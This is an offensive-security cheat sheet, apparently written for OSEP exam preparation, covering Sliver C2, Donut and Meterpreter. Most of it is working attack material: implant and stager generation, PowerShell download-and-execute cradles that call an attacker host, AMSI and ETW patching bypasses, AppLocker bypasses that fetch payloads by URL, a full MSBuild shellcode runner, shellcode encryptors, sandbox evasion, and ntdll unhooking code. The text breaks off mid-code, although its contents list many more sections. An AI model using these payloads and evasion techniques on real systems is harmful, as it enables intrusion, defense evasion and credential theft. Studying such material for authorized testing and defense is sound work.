OSEP Cheat Sheet — Sliver C2 / Donut / Meterpreter

Disclaimer: Compiled for OffSec OSEP exam preparation. All tools and techniques reference publicly available, open-source software. Credit belongs to the original authors. Use only in authorized engagements.


Table of Contents

  1. Tooling Setup & Infrastructure
  2. Sliver C2 Fundamentals
  3. OS & Programming Theory (Win32 API)
  4. Payload Generation & Delivery
  5. Donut — Shellcode Generation
  6. Meterpreter Fallback
  7. AMSI & ETW Bypass
  8. Constrained Language Mode & AppLocker Bypass
  9. AV/EDR Evasion Fundamentals
  10. Direct Syscalls & Unhooking
  11. Process Injection Techniques
  12. Custom Shellcode Loaders
  13. Client-Side Code Execution with Office (Initial Access)
  14. Client-Side Code Execution with JScript/VBScript
  15. HTML Smuggling
  16. Bypassing Network Filters
  17. Kiosk Breakouts
  18. Host Reconnaissance
  19. Privilege Escalation (Windows)
  20. Credential Theft (incl. Custom C# MiniDump)
  21. Domain Reconnaissance
  22. User Impersonation & Token Manipulation
  23. Lateral Movement (Windows)
  24. Linux Post-Exploitation
  25. Linux Lateral Movement (SSH Hijacking, Ansible, Artifactory, Kerberos)
  26. Pivoting & Port Forwarding (Sliver)
  27. Kerberos Attacks
  28. Active Directory ACE/ACL Abuse
  29. Active Directory Certificate Services (ADCS)
  30. Domain Dominance (Golden/Silver/Diamond Tickets)
  31. Forest & Domain Trust Abuse
  32. MSSQL Server Attacks (incl. UNC Path Injection)
  33. LAPS Abuse
  34. Group Policy Abuse
  35. Data Protection API (DPAPI)
  36. Persistence Mechanisms
  37. Linux Privilege Escalation
  38. .NET Assembly Execution In-Memory
  39. Reflective DLL Injection & DLL Sideloading
  40. Data Exfiltration

Tooling Setup & Infrastructure

Install Sliver

# One-liner install (latest release)
$ curl https://sliver.sh/install | sudo bash

# Or build from source
$ git clone https://github.com/BishopFox/sliver.git
$ cd sliver
$ make

# Start Sliver server
$ sliver-server

# Generate operator config for multiplayer
sliver > new-operator --name attacker --lhost <TEAMSERVER_IP>
# Import config on client machine
$ sliver-client import operator.cfg

Install Donut

# Build donut from source
$ git clone https://github.com/TheWover/donut.git
$ cd donut
$ make

# Or install the Python module
$ pip3 install donut-shellcode

Install Supporting Tools

# Impacket (for lateral movement, secretsdump, etc.)
$ pip3 install impacket

# Proxychains
$ sudo apt install proxychains4

# Ligolo-ng (advanced pivoting alternative)
$ go install github.com/nicocha30/ligolo-ng@latest

# Chisel (tunneling)
$ go install github.com/jpillora/chisel@latest

# Certipy (ADCS attacks)
$ pip3 install certipy-ad

# Krbrelayx
$ pip3 install krbrelayx

# NetExec (successor to CrackMapExec)
$ pip3 install netexec

Sliver C2 Fundamentals

Theory

Sliver is an open-source, cross-platform C2 framework by BishopFox. Unlike Cobalt Strike, it uses mutual TLS by default and supports multiple transport protocols. Key concepts:

  • Sessions = interactive, real-time connections (like a reverse shell)
  • Beacons = asynchronous, callback-based connections (like CS beacons — better OPSEC)
  • Implants = the payloads (can be sessions or beacons)
  • Stages vs Stageless = staged pulls shellcode from a stager listener; stageless is self-contained

Listeners

# Start an mTLS listener (default, encrypted)
sliver > mtls --lhost <IP> --lport 8888

# Start an HTTPS listener (blends with web traffic)
sliver > https --lhost <IP> --lport 443 --domain <domain.com>

# Start an HTTP listener (useful for proxied environments)
sliver > http --lhost <IP> --lport 80

# Start a DNS listener (slow but stealthy for egress-restricted nets)
sliver > dns --domains <c2.domain.com> --lport 53

# Start a WireGuard listener
sliver > wg --lport 53 --nport 8888 --key-port 1234

# Start a TCP pivot listener (for pivoted sessions, binds on implant)
sliver (IMPLANT) > pivots tcp --bind 0.0.0.0:9898

# List active listeners / jobs
sliver > jobs
sliver > jobs -k <JOB_ID>   # kill a listener

Implant Generation

# --- STAGELESS IMPLANTS (self-contained, larger but more reliable) ---

# Generate a stageless session implant (interactive)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format exe --save /tmp/implant.exe

# Generate a stageless beacon implant (async, better OPSEC)
sliver > generate beacon --mtls <IP>:8888 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 --save /tmp/beacon.exe

# Generate as shellcode (for custom loaders)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shellcode --save /tmp/implant.bin

# Generate as shared library (DLL)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shared --save /tmp/implant.dll

# Generate as service binary (for psexec-style lateral movement)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format service --save /tmp/implant_svc.exe

# Generate beacon over HTTPS
sliver > generate beacon --http <domain.com> --os windows --arch amd64 --format exe --seconds 5 --jitter 3 --save /tmp/https_beacon.exe

# --- STAGED IMPLANTS (smaller dropper, pulls payload from stager listener) ---

# Start a stager listener (TCP)
sliver > stage-listener --url tcp://<IP>:8443 --profile beacon-profile

# Start a stager listener (HTTP/HTTPS)
sliver > stage-listener --url http://<IP>:8080 --profile beacon-profile

# Generate a stager (small shellcode that connects to stage-listener)
sliver > generate stager --lhost <IP> --lport 8443 --protocol tcp --save /tmp/stager.bin

# --- PROFILES (save implant configs for reuse) ---
sliver > profiles new beacon --mtls <IP>:8888 --os windows --arch amd64 --format shellcode --seconds 5 --jitter 3 beacon-profile

sliver > profiles generate beacon-profile --save /tmp/from_profile.bin

# --- CROSS-PLATFORM ---

# Linux implant
sliver > generate --mtls <IP>:8888 --os linux --arch amd64 --format exe --save /tmp/implant_linux

# macOS implant
sliver > generate --mtls <IP>:8888 --os darwin --arch amd64 --format exe --save /tmp/implant_macos

# --- EVASION FLAGS ---

# Use debug flag to disable symbol stripping (easier to debug; remove for prod)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format exe --debug --save /tmp/debug_implant.exe

# Rename the implant (default names are random adjective-noun)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format exe --name LEGIT_SVC --save /tmp/legit_svc.exe

# Limit implant by datetime (kill date)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format exe --limit-datetime 2026-12-31 --save /tmp/limited.exe

Session / Beacon Interaction

# List active sessions and beacons
sliver > sessions
sliver > beacons

# Interact with a session
sliver > use <SESSION_ID>

# Interact with a beacon
sliver > use <BEACON_ID>

# Background the current session
sliver (IMPLANT) > background

# Kill an implant
sliver > sessions -k <SESSION_ID>
sliver > beacons -k <BEACON_ID>

# Interactive shell (session only — opens cmd.exe / bash)
sliver (IMPLANT) > shell

# Switch beacon to interactive session
sliver (BEACON) > interactive

# Rename implant for tracking
sliver > rename <OLD_NAME> <NEW_NAME>

# Get basic info
sliver (IMPLANT) > info
sliver (IMPLANT) > whoami
sliver (IMPLANT) > getuid
sliver (IMPLANT) > getpid
sliver (IMPLANT) > pwd
sliver (IMPLANT) > ps     # list processes

OS & Programming Theory

Theory

PEN-300 starts with the foundational concepts needed to write custom tooling. Understanding the Win32 API, process architecture, and how Windows manages memory and execution is critical for building loaders, injectors, and evasion techniques.

Win32 API Essentials

Key concepts:
- Win32 API = the user-mode interface to Windows kernel services (kernel32.dll, user32.dll, advapi32.dll)
- NT API = lower-level interface in ntdll.dll (NtAllocateVirtualMemory, NtCreateThread, etc.)
- Every Win32 call eventually passes through ntdll.dll → syscall → kernel
- EDRs hook functions in ntdll.dll to monitor API calls — this is why direct syscalls bypass them

Process memory layout:
- .text   = executable code
- .data   = initialized global variables
- .rdata  = read-only data (strings, imports)
- .bss    = uninitialized data
- Stack   = local variables, function call tracking (grows downward)
- Heap    = dynamic allocations (VirtualAlloc, HeapAlloc)

WoW64 (Windows on Windows 64-bit)

- Allows 32-bit processes to run on 64-bit Windows
- 32-bit processes can only inject into other 32-bit processes (and vice versa)
- System32 contains 64-bit DLLs, SysWOW64 contains 32-bit DLLs (counterintuitive!)
- File system redirector: a 32-bit process reading C:\Windows\System32 is silently redirected to SysWOW64
- To access real System32 from 32-bit process, use C:\Windows\Sysnative
- OSEP implication: always match architecture — use x64 implants on x64 systems

P/Invoke and .NET Interop

// P/Invoke = calling unmanaged (Win32) functions from managed (.NET) code
// This is how C# shellcode loaders call VirtualAlloc, CreateThread, etc.

using System.Runtime.InteropServices;

// Declare the Win32 function
[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

// Memory protection constants
// 0x40 = PAGE_EXECUTE_READWRITE (RWX — detectable, use PAGE_READWRITE then VirtualProtect)
// 0x04 = PAGE_READWRITE
// 0x20 = PAGE_EXECUTE_READ

// Allocation type constants
// 0x1000 = MEM_COMMIT
// 0x2000 = MEM_RESERVE
// 0x3000 = MEM_COMMIT | MEM_RESERVE

// Better OPSEC pattern: allocate RW, write shellcode, change to RX
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x04); // RW
Marshal.Copy(shellcode, 0, addr, shellcode.Length);
VirtualProtect(addr, (UIntPtr)shellcode.Length, 0x20, out uint oldProtect); // RX
// Then CreateThread to execute

Windows Registry (Persistence & Config)

# Key registry locations for OSEP:
# Autorun keys (persistence)
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

# AppLocker policy
HKLM\Software\Policies\Microsoft\Windows\SrpV2

# AMSI providers
HKLM\SOFTWARE\Microsoft\AMSI\Providers

# PowerShell execution policy
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

# Manipulate via command line
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
cmd> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\payload.exe" /f
cmd> reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /f

Payload Generation & Delivery

Theory

OSEP focuses on bypassing defenses. Raw .exe payloads are detected instantly. The pipeline is:

  1. Generate raw shellcode (Sliver .bin or Donut output)
  2. Feed into a custom loader (C#, C/C++, PowerShell, VBA)
  3. Optionally encrypt/encode the shellcode (XOR, AES, RC4)
  4. Deliver via phishing doc, HTA, LNK, or staged download

Python3 HTTP Server (Payload Hosting)

$ python3 -m http.server 80
$ python3 -m http.server 8080 --directory /tmp/payloads

PowerShell Download Cradles

# Basic download and execute
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/payload.ps1')

# With proxy-aware WebClient
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX $wc.DownloadString('http://<IP>/payload.ps1')

# Download file to disk
(New-Object Net.WebClient).DownloadFile('http://<IP>/implant.exe','C:\Windows\Temp\svc.exe')

# Invoke-WebRequest (PowerShell 3+)
iwr -Uri http://<IP>/implant.exe -OutFile C:\Windows\Temp\svc.exe

# certutil download (LOLBin)
certutil -urlcache -split -f http://<IP>/implant.exe C:\Windows\Temp\svc.exe

# bitsadmin download (LOLBin)
bitsadmin /transfer myJob /download /priority high http://<IP>/implant.exe C:\Windows\Temp\svc.exe

Base64 Encode PowerShell Payloads

# PowerShell
$str = 'IEX ((new-object net.webclient).downloadstring("http://<IP>/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://<IP>/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0

# Execute encoded payload
powershell -nop -w hidden -enc <BASE64_PAYLOAD>

Donut — Shellcode Generation

Theory

Donut converts .NET assemblies (EXEs/DLLs), VBScript, JScript, and PE files into position-independent shellcode. This shellcode can then be injected into a process, loaded via a custom loader, or combined with Sliver stagers. Donut handles CLR hosting automatically.

Basic Usage

# Convert a .NET assembly to shellcode (default: x86+amd64)
$ ./donut -i Rubeus.exe -o rubeus.bin

# Specify architecture (amd64 only, recommended)
$ ./donut -i Rubeus.exe -a 2 -o rubeus_x64.bin

# Pass arguments to the assembly
$ ./donut -i Rubeus.exe -a 2 -p "kerberoast /nowrap" -o rubeus_kerb.bin

# Convert with specific .NET entry class and method
$ ./donut -i SharpHound.exe -a 2 -c SharpHound.Program -m Main -o sharphound.bin

# Generate encrypted shellcode (AMSI/WLDP bypass built-in)
$ ./donut -i Seatbelt.exe -a 2 -z 2 -o seatbelt.bin
# -z 2 = aPLib compression (1=none, 2=aPLib)

# Convert a native PE (unmanaged EXE) to shellcode
$ ./donut -i mimikatz.exe -a 2 -o mimi.bin

# Convert a DLL with specific export function
$ ./donut -i payload.dll -a 2 -m DllRegisterServer -o payload.bin

# Convert VBScript/JScript
$ ./donut -i payload.vbs -o payload_vbs.bin
$ ./donut -i payload.js -o payload_js.bin

# Use a specific AMSI/WLDP bypass method
$ ./donut -i Rubeus.exe -a 2 -b 1 -o rubeus_bypass.bin
# -b 1 = Abort on fail, -b 2 = Continue on fail, -b 3 = None

# Python module
$ python3 -c "import donut; shellcode = donut.create(file='Rubeus.exe', arch=2, params='kerberoast /nowrap'); open('rubeus.bin','wb').write(shellcode)"

Using Donut with Sliver

# 1. Generate Sliver shellcode
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shellcode --save /tmp/sliver.bin

# 2. Use Donut to convert a .NET tool and inject both via a custom loader
$ ./donut -i SharpUp.exe -a 2 -p "audit" -o /tmp/sharpup.bin

# 3. The custom loader (see Custom Shellcode Loaders section) injects either payload
# Sliver shellcode → for C2 session
# Donut shellcode → for in-memory .NET execution

Meterpreter Fallback

Theory

Meterpreter is the go-to fallback when Sliver fails or when specific Metasploit post-exploitation modules are needed (e.g., getsystem, local exploit suggesters, hashdump). Combine with Sliver by running both side-by-side or by using Sliver's session to spawn a Meterpreter stager.

Generate Payloads

# Staged reverse HTTPS (smaller, pulls second stage)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe -o met_staged.exe
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f raw -o met_staged.bin

# Stageless reverse HTTPS (self-contained, larger)
$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<IP> LPORT=443 -f exe -o met_stageless.exe

# Shellcode for custom loaders
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f raw -o met.bin
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f csharp   # C# byte array
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f ps1       # PowerShell

# DLL payload (for DLL sideloading / hijacking)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f dll -o met.dll

# Service binary (for psexec)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe-service -o met_svc.exe

# MSI installer (for msiexec abuse)
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f msi -o met.msi

# HTA payload
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f hta-psh -o met.hta

# Linux
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o met_linux

Metasploit Listener Setup

$ sudo msfconsole -q

# Staged HTTPS handler
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_https
msf6 > set LHOST <IP>
msf6 > set LPORT 443
msf6 > set ExitOnSession false
msf6 > exploit -j

# Stageless HTTPS handler
msf6 > set payload windows/x64/meterpreter_reverse_https
msf6 > exploit -j

Common Meterpreter Commands

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > ps
meterpreter > migrate <PID>          # migrate into another process
meterpreter > getsystem               # attempt SYSTEM privesc
meterpreter > hashdump                 # dump SAM
meterpreter > load kiwi               # load mimikatz extension
meterpreter > creds_all                # dump all creds via kiwi
meterpreter > shell                    # drop to cmd
meterpreter > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe
meterpreter > download C:\\Users\\admin\\Desktop\\flag.txt
meterpreter > portfwd add -l 8080 -p 80 -r <TARGET_IP>
meterpreter > run autoroute -s 10.10.10.0/24
meterpreter > background

Session Passing: Sliver → Meterpreter

# From Sliver session, execute meterpreter stager
sliver (IMPLANT) > execute -o C:\Windows\Temp\met_staged.exe

# Or inject meterpreter shellcode into a process
sliver (IMPLANT) > execute-shellcode -p <PID> /tmp/met.bin

AMSI & ETW Bypass

Theory

AMSI (Antimalware Scan Interface) hooks into PowerShell, .NET, VBScript, JScript, and WMI to scan content before execution. ETW (Event Tracing for Windows) provides telemetry to EDR. Bypassing both is essential for in-memory execution.

AMSI bypass categories:

  1. Memory patching — Overwrite AmsiScanBuffer or AmsiInitialize in amsi.dll to always return clean
  2. COM Hijack / Provider registration — Redirect the AMSI COM provider
  3. Reflection-based — Use .NET reflection to set amsiInitFailed = true
  4. CLR hooking — Patch at the CLR level before assembly loads

ETW bypass: Patch EtwEventWrite in ntdll.dll to neuter telemetry.

Key OPSEC note: Public/well-known bypasses get signatured. Modify variable names, strings, and function names. Use obfuscation.

AMSI Bypass — PowerShell Reflection (Patch amsiInitFailed)

# Classic reflection bypass (WILL be signatured — obfuscate before use)
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$f=$a.GetField('amsiInitFailed','NonPublic,Static')
$f.SetValue($null,$true)

# Obfuscated variant (string concatenation to evade static signatures)
$a=[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA'))))
$f=$a.GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static')
$f.SetValue($null,$true)

AMSI Bypass — Memory Patching (AmsiScanBuffer)

# C# inline — patch AmsiScanBuffer to return AMSI_RESULT_CLEAN
# Compile as .NET assembly and run via Donut, or use Add-Type in PowerShell

# PowerShell P/Invoke version (obfuscate all strings!)
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32
$amsiDll = [Win32]::LoadLibrary("am" + "si.dll")
$amsiAddr = [Win32]::GetProcAddress($amsiDll, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($amsiAddr, [uint32]5, 0x40, [ref]$p)
$patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)   # mov eax, 0x80070057; ret
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $amsiAddr, 6)

ETW Bypass — Patch EtwEventWrite

# Patch EtwEventWrite to return immediately (neuters ETW-based detection)
$ntdll = [Win32]::LoadLibrary("nt" + "dll.dll")
$etwAddr = [Win32]::GetProcAddress($ntdll, "EtwEventWrite")
$p = 0
[Win32]::VirtualProtect($etwAddr, [uint32]1, 0x40, [ref]$p)
[System.Runtime.InteropServices.Marshal]::Copy([byte[]](0xC3), 0, $etwAddr, 1)  # ret

Sliver Built-in Evasion

# Sliver implants have built-in evasion features:
# - Implants are compiled from source (unique hashes each time)
# - Traffic encryption (mTLS, HTTPS, DNS, WireGuard)
# - Randomized C2 comms patterns
# - Support for loading BOFs which execute in-process

# Obfuscation at generation time (Sliver uses garble by default for Go obfuscation):
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shellcode --save /tmp/sliver.bin
# Each generation produces a unique binary

# Use the execute-shellcode command to run custom bypass shellcode first
sliver (IMPLANT) > execute-shellcode /path/to/amsi_bypass.bin

Constrained Language Mode & AppLocker Bypass

Theory

Constrained Language Mode (CLM) restricts PowerShell: no Add-Type, no arbitrary .NET, no COM objects. Triggered by AppLocker/WDAC policies or manual configuration.

AppLocker restricts which executables, scripts, DLLs, and packaged apps can run based on path, publisher, or hash rules. Default rules whitelist C:\Windows\* and C:\Program Files\*.

Detect CLM & AppLocker

# Check language mode
PS> $ExecutionContext.SessionState.LanguageMode
# "ConstrainedLanguage" = locked down
# "FullLanguage" = unrestricted

# Enumerate AppLocker policy (if accessible)
PS> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Via registry
PS> Get-ChildItem "HKLM:\Software\Policies\Microsoft\Windows\SrpV2"
PS> Get-ChildItem "HKLM:\Software\Policies\Microsoft\Windows\SrpV2\Exe"

# Via GPO (remote)
beacon> powershell Get-DomainGPO -Domain <DOMAIN> | ? { $_.DisplayName -like "*AppLocker*" } | select displayname, gpcfilesyspath

Bypass CLM

# 1. Sliver's execute-assembly runs .NET in an unmanaged runspace (bypasses CLM)
sliver (IMPLANT) > execute-assembly /path/to/Rubeus.exe kerberoast /nowrap

# 2. Sliver's shell command spawns cmd.exe (not PowerShell) — unaffected by CLM
sliver (IMPLANT) > shell

# 3. Use Sliver BOFs (Beacon Object Files) which execute in-process as C code
sliver (IMPLANT) > armory install sa-whoami
sliver (IMPLANT) > sa-whoami

# 4. PowerShell via custom unmanaged runspace (InstallUtil / MSBuild)
# See AppLocker bypass methods below

# 5. PSByPassCLM — tool to escape CLM by spawning a new PS process
# Build PSByPassCLM.exe, host it, and run from allowed path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\Windows\Temp\PSByPassCLM.exe

AppLocker Bypass Methods

# 1. Writable directories under whitelisted paths
# Find writable directories under C:\Windows
PS> Get-Acl C:\Windows\Tasks | fl
PS> Get-Acl C:\Windows\Temp | fl
PS> Get-Acl C:\Windows\Tracing | fl
PS> Get-Acl C:\Windows\Registration\CRMLog | fl
# icacls alternative
cmd> icacls C:\Windows\Tasks

# Common writable paths:
# C:\Windows\Tasks
# C:\Windows\Temp
# C:\Windows\Tracing
# C:\Windows\Registration\CRMLog
# C:\Windows\System32\spool\drivers\color

# Copy implant there and execute
sliver (IMPLANT) > upload /tmp/implant.exe C:\Windows\Tasks\legit.exe
sliver (IMPLANT) > execute C:\Windows\Tasks\legit.exe

# 2. MSBuild — Execute C# from XML/csproj (LOLBin)
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Temp\payload.csproj

# 3. InstallUtil — Execute via .NET installer class
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Temp\bypass.exe

# 4. Rundll32 — Load implant DLL
rundll32.exe C:\Windows\Tasks\implant.dll,StartW

# 5. Regsvr32 — Execute scriptlet from URL
regsvr32 /s /n /u /i:http://<IP>/payload.sct scrobj.dll

# 6. MSHTA — Execute HTA from URL
mshta http://<IP>/payload.hta

# 7. WMIC — Execute XSL stylesheet
wmic process list /FORMAT:"http://<IP>/payload.xsl"

# 8. CertUtil — Download and decode
certutil -urlcache -split -f http://<IP>/payload.exe C:\Windows\Tasks\payload.exe

# Note: DLL rules are often NOT enforced by AppLocker (performance reasons)
# So DLL-based implants (Sliver shared format) often work
rundll32.exe C:\Windows\Tasks\sliver.dll,DllMain

MSBuild Shellcode Runner Template

<!-- payload.csproj — MSBuild shellcode runner with XOR-encrypted Sliver shellcode -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
    <MSBuildTest/>
  </Target>
  <UsingTask TaskName="MSBuildTest" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Net;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;

public class MSBuildTest : Task, ITask
{
    public override bool Execute()
    {
        byte[] shellcode;
        using (var client = new WebClient())
        {
            shellcode = client.DownloadData("http://<IP>/sliver.bin");
        }

        // XOR decrypt (key must match encoder)
        byte key = 0x35;
        for (int i = 0; i < shellcode.Length; i++)
            shellcode[i] = (byte)(shellcode[i] ^ key);

        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);
        Marshal.Copy(shellcode, 0, addr, shellcode.Length);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
        return true;
    }

    [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
    [DllImport("kernel32")] static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr fn, IntPtr p, uint f, IntPtr id);
    [DllImport("kernel32")] static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

AV/EDR Evasion Fundamentals

Theory

Signature-based — AV compares file bytes/patterns against known-bad signatures. Bypass: modify bytes, encrypt payloads, recompile from source.

Heuristic-based — AV emulates code in a sandbox to detect suspicious behavior. Bypass: delay execution, detect sandbox, anti-emulation tricks.

Behavioral-based — EDR monitors API calls in real-time (hooks ntdll.dll). Bypass: direct syscalls, unhooking, indirect syscalls.

Payload Encryption & Encoding

// XOR encoder (Python — encrypt shellcode before embedding)
// xor_encrypt.py
import sys

key = 0x35
with open(sys.argv[1], 'rb') as f:
    shellcode = f.read()

encrypted = bytes([b ^ key for b in shellcode])

with open(sys.argv[1] + '.enc', 'wb') as f:
    f.write(encrypted)

print(f"[+] Encrypted {len(shellcode)} bytes with key 0x{key:02x}")

# Usage:
# python3 xor_encrypt.py sliver.bin
// AES encryption (C# — for more robust evasion)
// Encrypt shellcode with AES, embed key+IV in loader

using System;
using System.IO;
using System.Security.Cryptography;

class AESEncryptor
{
    static void Main(string[] args)
    {
        byte[] shellcode = File.ReadAllBytes(args[0]);
        using (Aes aes = Aes.Create())
        {
            aes.GenerateKey();
            aes.GenerateIV();
            Console.WriteLine($"Key: {Convert.ToBase64String(aes.Key)}");
            Console.WriteLine($"IV:  {Convert.ToBase64String(aes.IV)}");

            ICryptoTransform encryptor = aes.CreateEncryptor();
            byte[] encrypted = encryptor.TransformFinalBlock(shellcode, 0, shellcode.Length);
            File.WriteAllBytes(args[0] + ".aes", encrypted);
        }
    }
}

Sandbox Detection / Anti-Analysis

// C# — Common sandbox checks before executing payload
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class SandboxCheck
{
    [DllImport("kernel32.dll")] static extern bool IsDebuggerPresent();

    static bool IsSandbox()
    {
        // Check for debugger
        if (IsDebuggerPresent()) return true;

        // Check for low memory (sandboxes often < 2GB)
        if (new Microsoft.VisualBasic.Devices.ComputerInfo().TotalPhysicalMemory < 2147483648) return true;

        // Check for few processors
        if (Environment.ProcessorCount < 2) return true;

        // Sleep and check if time actually passed (sandboxes fast-forward sleep)
        DateTime before = DateTime.Now;
        System.Threading.Thread.Sleep(2000);
        if (DateTime.Now.Subtract(before).TotalSeconds < 1.5) return true;

        // Check for common sandbox process names
        string[] sandboxProcesses = { "vmsrvc", "vmusrvc", "vboxservice", "vboxtray", "vmtoolsd", "vmwaretray", "sandboxie" };
        foreach (var p in Process.GetProcesses())
            foreach (var s in sandboxProcesses)
                if (p.ProcessName.ToLower().Contains(s)) return true;

        return false;
    }
}

Direct Syscalls & Unhooking

Theory

EDRs hook ntdll.dll in userland to intercept API calls. Two main bypass approaches:

  1. Direct Syscalls — Call the kernel directly with the syscall instruction, bypassing the hooked ntdll entirely
  2. Unhooking — Reload a clean copy of ntdll.dll from disk and overwrite the hooked version in memory

Tools: SysWhispers2/3 (generate syscall stubs), SharpUnhooker, D/Invoke (.NET dynamic invoke)

D/Invoke (for .NET assemblies via Sliver)

// D/Invoke dynamically resolves and calls NT functions,
// bypassing IAT-based hooks and static analysis

// Use DInvoke NuGet package or embed DInvoke source
// Example: NtAllocateVirtualMemory via D/Invoke

using System;
using System.Runtime.InteropServices;
using DInvoke.DynamicInvoke;

// Allocate memory using NtAllocateVirtualMemory (direct NT call)
IntPtr stub = Generic.GetSyscallStub("NtAllocateVirtualMemory");
NtAllocateVirtualMemory ntAlloc = (NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtAllocateVirtualMemory));

IntPtr baseAddr = IntPtr.Zero;
IntPtr regionSize = (IntPtr)shellcode.Length;
uint status = ntAlloc(
    (IntPtr)(-1),    // current process
    ref baseAddr,
    IntPtr.Zero,
    ref regionSize,
    0x3000,          // MEM_COMMIT | MEM_RESERVE
    0x40             // PAGE_EXECUTE_READWRITE
);

Manual Unhooking (Reload ntdll from disk)

// Read a clean copy of ntdll.dll from disk and overwrite the .text section
// of the in-memory (hooked) version

using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Diagnostics;

class Unhook
{
    [DllImport("kernel32.dll")] static extern bool VirtualProtect(IntPtr addr, UIntPtr size, uint newProt, out uint oldProt);

    static void UnhookNtdll()
    {
        // Read clean ntdll from disk
        byte[] cleanNtdll = File.ReadAllBytes(@"C:\Windows\System32\ntdll.dll");

        // Get the in-memory module base
        Process proc = Process.GetCurrentProcess();
        IntPtr ntdllBase = IntPtr.Zero;
        foreach (ProcessModule mod in proc.Modules)
        {
            if (mod.ModuleName.ToLower() == "ntdll.dll")
            {
                ntdllBase = mod.BaseAddress;
                break;
            }
        }

        // Parse PE headers to find .text section
        int peOffset = Marshal.ReadInt32(ntdllBase + 0x3C);
        short numSections = Marshal.ReadInt16(ntdllBase + peOffset + 0x6);
        int optHeaderSize = Marshal.ReadInt16(ntdllBase + peOffset + 0x14);
